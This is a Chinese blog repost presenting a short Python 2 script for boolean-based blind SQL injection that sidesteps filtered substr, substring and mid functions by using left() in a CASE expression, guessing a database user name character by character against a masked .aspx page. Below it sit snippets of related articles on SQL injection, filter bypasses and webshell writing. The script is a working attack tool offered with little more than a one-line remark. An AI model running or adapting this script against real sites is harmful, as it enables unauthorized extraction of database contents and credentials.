禁用substr、substring、mid函数的sql注入脚本

最新推荐文章于 2023-04-07 22:04:49 发布
最新推荐文章于 2023-04-07 22:04:49 发布
阅读量116 收藏
点赞数
原文链接:http://www.cnblogs.com/dongchi/p/5387690.html
版权

 变懒了啊···

#encodeing=utf-8
import requests
import sys
 
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
 
headers = {
    'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************'
    }
 
print "test..."
 
user=""
for i in range(1,7):
    for payload in payloads:
        user+=payload
        aaa="--"
        d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user)
        test = d + aaa
        r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers)
        if r.status_code==200:
            print user
            break
        else:
            user=user[:-1]

  

转载于:https://www.cnblogs.com/dongchi/p/5387690.html

weixin_30335353
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL的SUBSTR()函数使用介绍
12-15
) 代码如下: MySQL: SUBSTR( ), SUBSTRING( ) Oracle: SUBSTR( ) SQL Server: SUBSTRING( ) ; 常用的方式是: SBUSTR(str,pos); 就是从pos开始的位置,一直截取到最后。 还有一种比较常用的是: 代码如下: SUBSTR...
SQL注入学习
qq_41007744的博客
05-01 684
字符串连接函数1. concat(str1,str2,...)连接参数产生的字符串。select concat(id,',',name) as con from info limit 1;2. group_concat(str1,str2,...)连接一个组所有的字符串,以逗号分割。3. concat_ws(separator,str1,str2,...)<br>含有分割符的连接字符串...
Sql注入总结
weixin_40709439的博客
05-12 1959
Sql注入总结 联合查询: 1、利用闭合变量报错测试注入点, ?id=1’ .这样说明存在单引号闭合注入 2、是否存在注入点,用and语句测试 ?id=1’ and 1=2# ?id=1’ and 1=1# 3、猜测字段 ,?id=1’ order by 3%23 4、找到页面中数据输入点, ?id=-1’ union select 1,2,3%23 5、查数据库,?id=1’ union ...
SQL注入-布尔盲注】
acepanhuan的博客
02-10 1569
学习SQL注入方法之盲注
JS中的substringsubstr函数的区别说明
11-30
1. 在JS中函数声明: stringObject.substring(start,stop) start是在原字符串检索的开始位置,stop是检索的终止位置,返回结果中不包括stop所指字符. 如:”hamburger”.substring(4,8) returns “urge” 2. substr...
Sql Server中Substring函数的用法实例解析
01-19
SQL 中的 substring 函数是用来抓出一个栏位资料中的其中一部分。这个函数的名称在不同的资料库中不完全一样: MySQL: SUBSTR( ), SUBSTRING( ) Oracle: SUBSTR( ) SQL Server: SUBSTRING( ) SQL 中的 substring ...
SQL函数substr使用简介
09-10
是介绍了sql中的substr()字符串截取函数的用法,十分的简单实用,有需要的同学可以参考一下。
web安全之SQL注入绕过技术(二)
Longwaer
02-24 1398
学习掌握SQL注入绕过技术,更好的用于日常渗透测试中发现风险点。
SQL注入--类型
sjsjshhs134654的博客
03-03 56
页面有回显,但是不会显示具体的内容 只会根据传参信息返回true和false传参任何东西返回结果都一样 页面返回值只有一种,true,无论输入任何值,返回情况都会按照正常的进行处理 加入特定的时间函数,通过查看web页面返回的时间差来判断注入语句是否正确函数 返回字符串的长度截取字符串m 从第m个字符开始截取 n 截取后字符串长度为n字符串拼接函数返回字符的ascii码 [将字符变为数字]将程序挂起一段时间n为n秒判断语句 如果第一个语句正确就执行第二个语句,如果错误执行第三个语句。
渗透入门三:SQL注入
m0_60200366的博客
05-12 677
1.union注入 1、判断注入点 2、判断是闭合形式 3、判断查询列数 4、判断显示位 5、获取所有数据库名 6、获取数据库所有表名 7、获取字段名 8、获取字段中的数据 先判断闭合方式 尝试 ?id=1’ ?id=1” 如果都报错,则为整形闭合。 如果单引号报错,双引号不报错。 尝试 ?id=1’–+ 无报错则单引号闭合。 报错则单引号加括号。 如果单引号不报错,双引号报错。 尝试 ?id=1"–+ 无报错则双引号闭合。 报错则双引号加括号。 多层括.
自己整理MySQL盲注
明哥哥知识分享
08-17 852
一、基于时间延时的盲注:SLEEP 函数 SLEEP( 数字) 函数使用说明:延迟函数,为真时会延时执行代码,为假则不会执行延时。(数字为整数,例:1就是延迟一秒执行。) 例如: Select * from 表名 where id=1 and sleep(2); 有这个id=1的内容延迟2秒执行,没有则相反。 二、配合if条件触发 IF(expr1, expr2, expr3) 如果IF(1>2, 真, 假)是true,那它的返回值就是真,如果执行条件是false,执行的条件就是假,具体情况视其所在
SQL注入截取字符串常用函数
weixin_30699955的博客
10-22 255
这里主要列举3个函数:mid(),substr(),left() mid()函数 MID(column_name,start[,length]) column_name 必需。要提取字符的字段 start 必须。规定开始位置(起始值为1) length 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。 ...
sql中substr()函数用法详细
热门推荐
陈老老老板的博客
08-23 1万+
注意:在mysql数据库中,SUBSTR函数是用来截取数据库某一列字段中的一部分,在各个数据库的函数名称不一样。 功能:SUBSTR函数用来截取数据库某一列字段中的一部分。 在各个数据库的函数名称不同: MySQL: SUBSTR( ), SUBSTRING( ) Oracle: SUBSTR( ) SQL Server: SUBSTRING( ) ; 常用方式: //从pos开始的位置,一直截取到最后。 SBUSTR(str,pos); 另外一种常用方式: //从pos开始的位置,截取len个字符(
sql 语句用substr 不用 like 可以提升查询效率
洛少的专栏
07-13 6862
据说在sql查询时用substr代替like 可以提升查询效率 像下面的例子: 用这个substr关键字 SELECT * FROM iplog a WHERE substr(a.ip, 0, 5) ='88.12' 用这个like关键字 SELECT * FROM iplog a WHERE a.ip LIKE '88.12%'
sql substring_让你的SQL盲注快起来
weixin_39607935的博客
11-26 121
SQL 注入是当前 Web 安全中最常见的安全问题之一,其危害性也比较大,众多白帽子在渗透测试过程中往往会首先着重进行 SQL 注入的测试。盲注是 SQL 注入的重要的技术之一,在现实中的 SQL 注入案例中,往往很难将注入的结果直接回显出来。因此,盲注也就成为了 SQL 注入必不可少的手段之一。本文想分享一个如何大大提升盲注效率的技巧。与或运算与或运算,操作符分别为&以及...
web安全学习笔记--sql基础下(sql注入
m0_64348326的博客
05-01 1969
目录 一、SQL函数 二、SQL注入类型 2-1 字符及整数型注入 2-2 报错注入 2-3 布尔及时间盲注 2-4 堆叠注入 三、WAF绕过及关键词过滤 关键词绕过 WAF绕过 sql-quine 一、SQL函数 1-1 读取函数以及导出函数(要求有读写权限以及文件绝对路径) load_file()函数可用于读取敏感文件,into outfile/dumofile导出函数可用于写webshell 读配置文件:1' union select 1,2,load_file(
【Web安全攻防从入门到精通】SQL注入 _
weixin_72368685的博客
04-07 509
网络安全是当今信息时代中非常重要的一环。无论是找工作还是感兴趣(黑客),都是未来职业选择中上上之选,为了保护自己的网络安全,学习网络安全知识是必不可少的。
substrsubstring函数区别
最新发布
06-28
substrsubstring函数都是用来截取字符串的函数,但是它们的用法和区别如下: 1. substr函数 substr函数是从字符串的指定位置开始截取指定长度的子字符串。它的语法如下: substr(string,start,length) 其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值